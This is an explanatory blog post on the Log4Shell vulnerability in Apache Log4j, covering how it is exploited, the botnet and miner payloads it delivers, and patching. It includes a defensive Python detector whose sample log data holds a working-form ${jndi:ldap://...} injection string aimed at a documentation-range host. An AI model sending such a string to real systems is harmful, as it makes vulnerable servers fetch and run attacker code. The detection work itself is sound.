People sometimes compare cybersecurity to a game of whack-a-mole. Hackers discover new vulnerabilities to exploit, and developers scramble to knock them down, releasing patches to mitigate the emerging threat.
Unfortunately, it’s not that simple. Completely removing a vulnerability with a single update is challenging. First, you have to understand the full extent of the threat and deliver a comprehensive solution quickly. Next, you’ve got to get everyone to download and install the update.
Sometimes vulnerabilities are found in widely used software embedded deep in systems such that the organizations and people using it aren’t even aware they are at risk.
This is why the vulnerability in the Log4j software is still a problem. Although we have an update solving the problem, many organizations at risk are unaware their systems even use the Log4j software. The vulnerability is still regularly leveraged to deploy malware, including recruiting infected devices into DDoS botnets or planting crypto miners.
The continuing threat from vulnerabilities we know about and have patches for, let alone those yet to be found, highlights the limitations of a whack-a-mole approach to cybersecurity. Instead, organizations need to get ahead of the issue. They need proactive protection plans that include advanced bot protection, web application firewalls, DDoS mitigation, and more.
What is Log4Shell?
Log4j is an open-source piece of software developed by the Apache Software Foundation. It records events (errors, routine system operations, etc.) to communicate diagnostic messages to system administrators and users. It essentially acts as a massive diary logging the activity for a given system or application.
An example of Log4j in operation is the “404 error message” you see when clicking on a bad link online. The web server for that domain informs you the webpage doesn’t exist, but it also logs the event using Log4j for the server’s system administrators to see.
Almost every piece of software out there will log information in some form for security, operational, or development reasons, and Log4j is a popular option. It is found across a vast number of software packages and online services, from cloud services like iCloud and AWS to popular games such as Minecraft and a broad range of software development and security tools.
In December 2021, a security researcher at Alibaba Cloud found a Remote Code Execution (RCE) vulnerability in Log4j. This vulnerability has become known as Log4Shell.
Log4Shell abuses a feature where users can specify custom code to format a log message. Unfortunately, this feature also allows third-party servers to submit code that can perform many different actions on a targeted computer. Left unfixed, Log4Shell lets bad actors into a system to take control of it, steal sensitive information, and infect networks with malicious software. The exploit is also relatively simple to act on and doesn’t require high-level knowledge.
To carry out a cyberattack exploiting Log4Shell, hackers query services in order to trigger a log message. An example could be querying a web server to trigger a 404 error. However, the query also includes malicious code that Log4j mistakes for instructions.
From these instructions, cybercriminals can create a reverse shell and remotely control the target server or make it part of a botnet (multiple hijacked systems for coordinated attacks). Many hackers are currently abusing Log4Shell for:
- Ransomware attacks
- Mining cryptocurrency
- Attacks on government agencies, which we’ve already seen targeted
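The scenario above, where a request that triggers a log entry smuggles in instructions, is something a defender can watch for in ordinary access logs. As an added example that is not part of the original post, this Python detector runs over constructed web-server log lines and flags Log4j lookup syntax in the request fields a client controls; it assumes the Apache combined log format, and the `${jndi:` prefix it rates highest is the Log4Shell signature published in Apache's own advisory.

```python
import re

# Log4j evaluates ${...} lookup syntax inside logged strings. Legitimate clients
# never send it, so any occurrence in an untrusted request field is suspicious;
# a jndi lookup is the specific Log4Shell signature.
LOOKUP = re.compile(r"\$\{[^}]*\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Combined log format: host ident user [time] "request" status size "referer" "agent"
CLF = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
                 r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

def classify(line):
    # Returns (severity, field) for one access-log line, or None if it looks clean.
    m = CLF.match(line)
    if not m:
        return None  # unparsable line: leave it for a separate "malformed" queue
    for field in ("request", "referer", "agent"):  # all client-controlled fields
        value = m.group(field)
        if JNDI.search(value):
            return ("high", field)
        if LOOKUP.search(value):
            return ("medium", field)
    return None

def scan(lines):
    # Returns [(line_no, severity, field, client)] for every suspicious line.
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict[0], verdict[1], CLF.match(line).group("host")))
    return hits

# Constructed sample lines (203.0.113.0/24 is a documentation range, not a real host).
# Line 2 mirrors the post's scenario: a request for a missing page (404) whose
# User-Agent carries a lookup that a vulnerable Log4j would evaluate when logging it.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:01:05 +0000] "GET /missing HTTP/1.1" 404 0 "-" "${jndi:ldap://203.0.113.50/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:01:07 +0000] "GET /?q=${hostName} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: %s-severity lookup in %s from %s" % hit)
```

Matching the generic `${...}` form as well as the `jndi` prefix means the detector does not depend on the exact string an attacker chose.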
Apache attempted to solve the problem by releasing an update, version 2.15.0. After identifying subsequent vulnerabilities, they released version 2.17.1, finally closing the loop on Log4Shell.
Log4Shell is an Enduring Threat
Reports suggest while there have been peaks and dips since Log4Shell’s discovery, the overall number of attacks remains relatively constant.
Remember how we mentioned the challenge of getting everyone to update their software? Unfortunately, hackers still have a long list of potential targets running old Log4j versions to choose from: these include home users, service providers, software developers, and more.
While big companies like Amazon can mobilize en masse to patch their web services, many organizations are slower to react. Plus, it isn’t always immediately clear what exposure an organization has to Log4Shell. As a result, many may not even know they need to act.
Of the various malware payloads being delivered through Log4Shell, the most popular seems to be the Mirai botnet derivatives. Mirai malware targets publicly exposed devices such as network cameras and routers, making them part of a botnet.
These botnets can then be used for DDoS attacks against specific targets. The cybercriminals can then rent out their botnet for others to use or extort companies themselves by disrupting online services.
As large organizations become wise to the threat and update their Log4j installations, the opportunity for lucrative ransomware attacks shrinks. But there are many neglected systems users forget to update that are ideal targets for crypto mining and DDoS attacks.
Aside from Mirai, other malicious payloads in recent Log4Shell attacks include BillGates malware (DDoS), Kinsing (crypto miner), XMRig (crypto miner), and Muhstik (DDoS).
Protecting Against Log4Shell Botnets
The easiest way to protect against Log4Shell attacks is to keep all of your software up to date, ensuring they use Log4j version 2.17.1 or later.
Mirai botnets typically target devices that do not allow individual packages to be updated, so for those you need to check for firmware releases that include the Log4j fixes and apply them.
There is also a range of solutions available to ensure you don’t become the target of a botnet full of Log4Shell recruits. These typically scan your traffic for anomalies, divert potential attacks, and separate real visitors from the bots that are just looking to bring down your service.
Stay informed and stay safe
Unfortunately, it seems Log4Shell attacks in some form are here to stay for now. But by staying informed, learning where Log4j fits into your software ecosystem, and looking into anti-DDoS solutions, you can keep your network safe from hackers and prevent your services from going down.